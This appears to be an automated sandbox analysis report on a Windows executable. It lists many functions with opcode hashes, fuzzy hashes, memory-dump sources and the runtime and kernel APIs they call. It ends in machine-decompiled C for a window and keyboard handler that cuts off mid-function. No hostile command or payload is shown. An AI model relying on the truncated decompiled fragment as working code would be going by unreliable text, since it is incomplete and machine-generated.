Opcode ID: 32b33ce7d1c3420791ffecd5b7a105f0d7bb5d1b5db2cab283527c0a54049ae6
Instruction ID: e6f66bd59e1b13e514e40f76744447d196e621d9c36daaf36c278e0e1607c6d2
Opcode Fuzzy Hash: 32b33ce7d1c3420791ffecd5b7a105f0d7bb5d1b5db2cab283527c0a54049ae6
Instruction Fuzzy Hash: 6C015270284349BEF3241E28CC9AF667ADCEB05768F10C319FAE56A1E1C6B55D458B18

Uniqueness

Uniqueness Score: -1.00%

Function 00ABBBC6, Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00ABBC07

Part of subcall function 00AC1821: _memmove.LIBCMT ref: 00AC185B

_wcscat.LIBCMT ref: 00AF3593

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: FullNamePath_memmove_wcscat
String ID:
API String ID: 257928180-0
Opcode ID: efc9df9ada75ea99e7f5861eebfe62cb675a18b1708df0e3f6317ac08ebfd8f8
Instruction ID: 9fa9335eafd1853039633f86fc1e03b1d2efb1e5326a2ba3957304808669fa19
Opcode Fuzzy Hash: efc9df9ada75ea99e7f5861eebfe62cb675a18b1708df0e3f6317ac08ebfd8f8
Instruction Fuzzy Hash: 2811A531A142089BCB01EFA4D946EDD77FCFF0E350B0140AAB949D7292DFB097845B61

Uniqueness

Uniqueness Score: -1.00%

Function 00AD581D, Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AD584C
__lock_file.LIBCMT ref: 00AD586D

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: a7953c6a47b988993a68d272a00ff24e2ec65a63fcaba952d198e1827649006e
Instruction ID: 0a0d53a413efd51c38bdb8e87be80f6b7ad8ae12f77998960a6bd5ca39a45071
Opcode Fuzzy Hash: a7953c6a47b988993a68d272a00ff24e2ec65a63fcaba952d198e1827649006e
Instruction Fuzzy Hash: EA014471C00749EBCF11AF7ACD0199E7B61AF80360F188157B8265A3A1DB358A51FF91

Uniqueness

Uniqueness Score: -1.00%

Function 00AD55C6, Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00AD8D58: __getptd_noexit.LIBCMT ref: 00AD8D58

__lock_file.LIBCMT ref: 00AD560B

Part of subcall function 00AD6E3E: __lock.LIBCMT ref: 00AD6E61

__fclose_nolock.LIBCMT ref: 00AD5616

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: fe759ea0b259516d7e858e6cbdd103f2844dd138f0db0fa237e118e3bf9ccc01
Instruction ID: dc5138554155f845e942189b216e5a7c6c2c90aef83c12c91779a0df62e50730
Opcode Fuzzy Hash: fe759ea0b259516d7e858e6cbdd103f2844dd138f0db0fa237e118e3bf9ccc01
Instruction Fuzzy Hash: 19F09071C01B059AD7126B799902B6E77E16F41331F25824BA466AB3C1CB7C89019B51

Uniqueness

Uniqueness Score: -1.00%

Function 00AD5E80, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00AD5EB4
__ftell_nolock.LIBCMT ref: 00AD5EBF

Part of subcall function 00AD8D58: __getptd_noexit.LIBCMT ref: 00AD8D58

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: dfeff82eb88384a3dd5d82a856e72a28070c0febaf60396717a8a6e6a1fa1891
Instruction ID: 3f6afc14d5dcf130d8273639de3801a0b1a23ea3b8d9f326d90a23a916e83940
Opcode Fuzzy Hash: dfeff82eb88384a3dd5d82a856e72a28070c0febaf60396717a8a6e6a1fa1891
Instruction Fuzzy Hash: 68F0E531D116159ADB00BB798A0376E77A06F01332F254347B026AB3D2CF7C8E029B91

Uniqueness

Uniqueness Score: -1.00%

Function 00AC124D, Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,?,?,00AC3BAB,00B40980,?,00B40980,?,?), ref: 00AC1266

Part of subcall function 00AD0FE6: _malloc.LIBCMT ref: 00AD0FFE

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,00000000,?,?,00AC3BAB,00B40980,?,00B40980,?,?), ref: 00AC1299

Part of subcall function 00AC1364: _memmove.LIBCMT ref: 00AC13A0

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_malloc_memmove
String ID:
API String ID: 961785871-0
Opcode ID: 7ab09c160e000f3a4ad2a29fa84e87d8014a48c5d170363d3387d5e28f125ccf
Instruction ID: a0d37d9a779c2ad586060d4961875d3504d2d6c6e9fc2dbbc3e0fbf80ddb5eca
Opcode Fuzzy Hash: 7ab09c160e000f3a4ad2a29fa84e87d8014a48c5d170363d3387d5e28f125ccf
Instruction Fuzzy Hash: 7D016D762052047FEB246B25DD96FBB3B6DEF86760F10812AF906DE291DA319900C661

Uniqueness

Uniqueness Score: -1.00%

Function 00ABA820, Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d66dc066befdb2183187cfe49d03defe066dc19de5e18dc184c4f2466801c5bb
Instruction ID: 48ea99a618f802fae7839159aaa6058ab815da6f90d875321b115c3740c4164e
Opcode Fuzzy Hash: d66dc066befdb2183187cfe49d03defe066dc19de5e18dc184c4f2466801c5bb
Instruction Fuzzy Hash: 6461DD70600606DFDB10DF94C981BBAB7F9EF14300F11846DE91A8B292E774ED80DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00AC410A, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00AC41B2

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: f142879b21b2a98acf0120c85dfb60abb9c44628b39328972e5db9a35d43ebe8
Instruction ID: f4fa23e13e52038062390eb88f1df7a1caf839e238171ef1f5f5a9c09bc4dc01
Opcode Fuzzy Hash: f142879b21b2a98acf0120c85dfb60abb9c44628b39328972e5db9a35d43ebe8
Instruction Fuzzy Hash: 51314C71A0061AAFCB18DF6DC890BADB7B5FF58310F198629E85993710D770BDA0CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00AC49C2, Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00AC4B63

Part of subcall function 00AD547B: __wfsopen.LIBCMT ref: 00AD5486

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00AC27AF,?,00000001), ref: 00AC49F4

Part of subcall function 00AC4ADE: FreeLibrary.KERNEL32(00000000), ref: 00AC4B18

Part of subcall function 00AC48B0: _memmove.LIBCMT ref: 00AC48FA

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 839462f15550af20f1fa03560a8a2055eb9f2077e36b22025717dc2f0cf8ad20
Instruction ID: 468ac96253cf9130c1fec0af4fd695f7b9988e6d8c307d6f1b347d279d8b7c97
Opcode Fuzzy Hash: 839462f15550af20f1fa03560a8a2055eb9f2077e36b22025717dc2f0cf8ad20
Instruction Fuzzy Hash: F9110132650205ABCB20FB708D22FAE77A99F48741F11842DF545AA1C1EE708A00ABA8

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4220, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00AC3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00AC4276

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 58cf4db052a8c744172e7eea1564c9c0bd6f2c987e7f8e9115ec94ac7aaf4761
Instruction ID: 2330a5cd2c5ec20e8bb7755ae436a853c89886464404535218f0702e8d1e85e1
Opcode Fuzzy Hash: 58cf4db052a8c744172e7eea1564c9c0bd6f2c987e7f8e9115ec94ac7aaf4761
Instruction Fuzzy Hash: D71128352007019FD730CF55C491FA2B7F9EF98710F15892DE9AA86A50D770E8458B64

Uniqueness

Uniqueness Score: -1.00%

Function 00AC3EBE, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00AC3EF6

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy
String ID:
API String ID: 3048848545-0
Opcode ID: 723712a67ac4c7bb138e4dcb30ed5178b0b7e88fe59e113297e06dfd62ddb98d
Instruction ID: d1e06df42b2c5d85631cc2fd04d7374ed71b1d12784a8b757c47f8a82f1af6e5
Opcode Fuzzy Hash: 723712a67ac4c7bb138e4dcb30ed5178b0b7e88fe59e113297e06dfd62ddb98d
Instruction Fuzzy Hash: 49E0E53231C3102A9D1527199C82E7EB3EDDF9A330711062FF4019B2D2DE92291652B4

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4A8C, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00AC4AA4

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 6665fddf3367af9aefe41bca4e68b0a2b2f40a629bbfcc9a4c7c50e03f9861ad
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 9DF085B6800208BFDF109F94DC04DEBBFB9EF89720F00419CF9045A220D232EA218BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4A2F, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00AC27AF,?,00000001), ref: 00AC4A63

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: caa844634921683f08bc1b28e7fba2df3d5f8ca3e34128ffbcc3c3d8ce20ae90
Instruction ID: 9c3080b7afb1a97bcd491942b5473b1e74779ac5b100d318bbeabb60b4d5a2ff
Opcode Fuzzy Hash: caa844634921683f08bc1b28e7fba2df3d5f8ca3e34128ffbcc3c3d8ce20ae90
Instruction Fuzzy Hash: 95F015B5145701CFCB349F64E4A0E26BBF0BF18365321A92EE5E783610CB319984DF48

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4AB2, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00AC4AD0

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: dced8693087051f4af6f7c662ed2d56f4b7b1a3a76d146db7bf32ccb4a0cb8d7
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: B7F0F87240020DFFDF05DF94C941EAABBB9FB18314F218589F9198A252D336DA21AB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AD09C5, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AD09E4

Part of subcall function 00AC1821: _memmove.LIBCMT ref: 00AC185B

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 8a381b3bb55c20d8814f25efff5fed79d53e336dbebf8d5966b5fa4dafb13d83
Instruction ID: 0bad8465e4e4aa2acc0990ed45b1b3d9e19843c11ec3b0ba00a5af6bb075ea7f
Opcode Fuzzy Hash: 8a381b3bb55c20d8814f25efff5fed79d53e336dbebf8d5966b5fa4dafb13d83
Instruction Fuzzy Hash: 39E08636A1412857C721A6989C05FEE77DDEB8A691F0502B6FD08D7204D9749D8186D1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC436A, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

Part of subcall function 00AD0FE6: _malloc.LIBCMT ref: 00AD0FFE

_wcscpy.LIBCMT ref: 00AC438D

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc_wcscpy
String ID:
API String ID: 1047721496-0
Opcode ID: 9e597e92892e292ac210cc9a9f9bdae68a5cd9ed4cec77d77ed568497af69c0c
Instruction ID: ee0932cb46427d566837b3e37f833fac2bbe3c2910a5a4539ebe0d976adb3c8a
Opcode Fuzzy Hash: 9e597e92892e292ac210cc9a9f9bdae68a5cd9ed4cec77d77ed568497af69c0c
Instruction Fuzzy Hash: 6ED0A73330111026A629323D6E07E7F551CCFD26A0B05103FF603CA291ED404C0241B0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC42CF, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,00000000,00AF2F8B), ref: 00AC42EF

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ea47e89307417bffee120cda3aeb19ac6bc5bf46d54055fb7f8897771548307b
Instruction ID: 252df7a6e4c421407abbd4685f204be36474ee042b2e3bf63b2bcaa766d425f7
Opcode Fuzzy Hash: ea47e89307417bffee120cda3aeb19ac6bc5bf46d54055fb7f8897771548307b
Instruction Fuzzy Hash: 4BE0B679400B01CFC3314F1AE815852FBF8FFE93713224A2EE4E692660D7B0589ADB54

Uniqueness

Uniqueness Score: -1.00%

Function 00AD2E74, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

Part of subcall function 00AD3447: __lock.LIBCMT ref: 00AD3449

__onexit_nolock.LIBCMT ref: 00AD2E90

Part of subcall function 00AD2EB8: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,00AD2E95,00AEB7EA,00B6CB50), ref: 00AD2ECB
Part of subcall function 00AD2EB8: DecodePointer.KERNEL32(?,?,00AD2E95,00AEB7EA,00B6CB50), ref: 00AD2ED6
Part of subcall function 00AD2EB8: __realloc_crt.LIBCMT ref: 00AD2F17
Part of subcall function 00AD2EB8: __realloc_crt.LIBCMT ref: 00AD2F2B
Part of subcall function 00AD2EB8: EncodePointer.KERNEL32(00000000,?,?,00AD2E95,00AEB7EA,00B6CB50), ref: 00AD2F3D
Part of subcall function 00AD2EB8: EncodePointer.KERNEL32(00AEB7EA,?,?,00AD2E95,00AEB7EA,00B6CB50), ref: 00AD2F4B
Part of subcall function 00AD2EB8: EncodePointer.KERNEL32(00000004,?,?,00AD2E95,00AEB7EA,00B6CB50), ref: 00AD2F57

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: fb35ef4e1b307dd41d481842a0cbbd5008c8cfb4e86774aa1d31c5348acfadb0
Instruction ID: 5354ece3b114a32d4d6637b5c27db06eca7b1172ebd80993e7a51834ac24c8a5
Opcode Fuzzy Hash: fb35ef4e1b307dd41d481842a0cbbd5008c8cfb4e86774aa1d31c5348acfadb0
Instruction Fuzzy Hash: F9D012B2D10309AADB10BBA4CA0675D7AB06F10722F504147F066663D2CFBC0A429B91

Uniqueness

Uniqueness Score: -1.00%

Function 00AD547B, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00AD5486

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: fd2582ac7c1fcd227637dcb495e7843585fbfd89550e49d24ffca79570694d59
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 94B09B7544010C77CE011951EC03A553B295740665F408011FB0C1C161A57395605585

Uniqueness

Uniqueness Score: -1.00%

Function 00AD0E38, Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00AD0EE7

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 27c9673448a4cab365f85b91475d01393662558ef1d030f6d742c52f92cb95c4
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 8531B275A001099BD718DF59C484A69FBB6FF99300F648AA6E40ACB351EB31EDC1CBC0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B3D164, Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00B3D164(void* __ebx, struct HWND__* _a4, int _a8, long _a12) {
				intOrPtr _v24;
				long _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v84;
				long _v92;
				void* _v96;
				signed int _v108;
				int _v112;
				void* _v116;
				struct HWND__** _v120;
				intOrPtr _v124;
				long _v128;
				signed int _v132;
				int _v136;
				void* _v140;
				char _v144;
				struct HWND__* _v148;
				struct tagPOINT _v156;
				struct tagPOINT _v164;
				signed int _v165;
				signed int _v168;
				signed int _v172;
				long _v176;
				void* __edi;
				signed int _t221;
				signed int _t223;
				long _t224;
				intOrPtr _t226;
				signed int _t228;
				signed int _t229;
				signed int _t232;
				intOrPtr _t233;
				signed int _t236;
				intOrPtr _t239;
				signed int _t242;
				intOrPtr _t244;
				intOrPtr _t251;
				intOrPtr _t254;
				signed int _t258;
				intOrPtr _t261;
				signed int _t271;
				intOrPtr _t273;
				intOrPtr _t275;
				long _t279;
				intOrPtr _t282;
				signed int _t288;
				signed int _t291;
				intOrPtr _t293;
				signed int _t295;
				signed int _t303;
				intOrPtr _t306;
				signed int _t310;
				long _t318;
				signed int _t341;
				intOrPtr _t342;
				intOrPtr _t347;
				intOrPtr _t352;
				signed int _t357;
				signed int _t359;
				short _t362;
				short _t363;
				short _t365;
				signed int _t367;
				struct HWND__* _t374;
				signed int _t375;
				long _t376;
				intOrPtr _t383;
				intOrPtr _t385;
				intOrPtr _t387;
				intOrPtr _t388;
				intOrPtr _t390;
				long _t393;
				struct HMENU__* _t395;
				signed int _t397;
				struct HMENU__* _t399;
				signed int _t401;
				intOrPtr _t405;
				signed int _t417;
				void* _t418;
				intOrPtr _t419;
				intOrPtr _t420;
				long _t422;
				intOrPtr _t426;
				signed int _t429;
				struct tagPOINT* _t439;
				intOrPtr _t440;
				int _t441;
				long _t443;
				signed int _t444;
				intOrPtr _t445;
				void* _t450;
				void* _t451;

				_t221 = E00AB29E2(0xb777b0, _a4);
				_t383 =  *0xb77810; // 0xca4420
				_t422 = _a12;
				_v148 = _t221;
				_t426 =  *((intOrPtr*)( *((intOrPtr*)(_t383 + _t221 * 4))));
				_t385 =  *((intOrPtr*)(_t422 + 8));
				_v124 = _t426;
				_t450 = _t385 - 0xfffffe6e;
				if(_t450 > 0) {
					__eflags = _t385 - 0xfffffff0;
					if(__eflags > 0) {
						__eflags = _t385 - 0xfffffff4;
						if(_t385 == 0xfffffff4) {
							_t223 = E00AB29AB(0xb777b0,  *_t422);
							_v168 = _t223;
							__eflags = _t223 - 0xffffffff;
							if(_t223 == 0xffffffff) {
								L12:
